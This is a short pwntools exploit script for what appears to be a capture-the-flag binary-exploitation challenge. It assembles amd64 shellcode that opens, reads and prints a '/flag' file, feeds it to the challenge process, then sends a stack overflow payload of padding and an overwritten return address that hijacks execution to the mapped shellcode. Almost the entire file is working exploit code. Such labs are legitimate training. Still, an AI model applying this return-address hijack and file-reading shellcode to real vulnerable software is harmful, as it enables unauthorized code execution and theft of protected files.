from pwn import *

# Modified shellcode to use absolute path to flag
shellcode = asm('''
    /* Open flag file */
    mov rax, 2          /* SYS_open */
    lea rdi, [rip+flag] /* filename */
    xor rsi, rsi        /* O_RDONLY */
    syscall
    
    /* Read flag content */
    mov rdi, rax        /* fd */
    mov rax, 0          /* SYS_read */
    sub rsp, 100        /* buffer space */
    mov rsi, rsp        /* buffer */
    mov rdx, 100        /* count */
    syscall
    
    /* Write to stdout */
    mov rdx, rax        /* count */
    mov rax, 1          /* SYS_write */
    mov rdi, 1          /* stdout */
    mov rsi, rsp        /* buffer */
    syscall
    
    /* Exit cleanly */
    mov rax, 60         /* SYS_exit */
    xor rdi, rdi        /* status = 0 */
    syscall

flag:
    .string "/flag"    # Absolute path
''', arch='amd64')

p = process('/challenge/binary-exploitation-hijack-to-mmap-shellcode-w')

p.send(shellcode)
p.recvuntil(b'Press enter to continue!')
p.sendline()

# From the stack dump I received:
# - Buffer starts at rsp+0x20
# - Return address is at 0x7fff539fd8c8
# - Buffer starts at 0x7fff539fd890
# - So offset is 0x38 bytes (0x8c8 - 0x890 = 0x38)
payload = b'A' * 0x38       # Padding to return address
payload += p64(0x2a55b000)  # Address where shellcode is mapped

p.sendline(payload)
print(p.recvall().decode())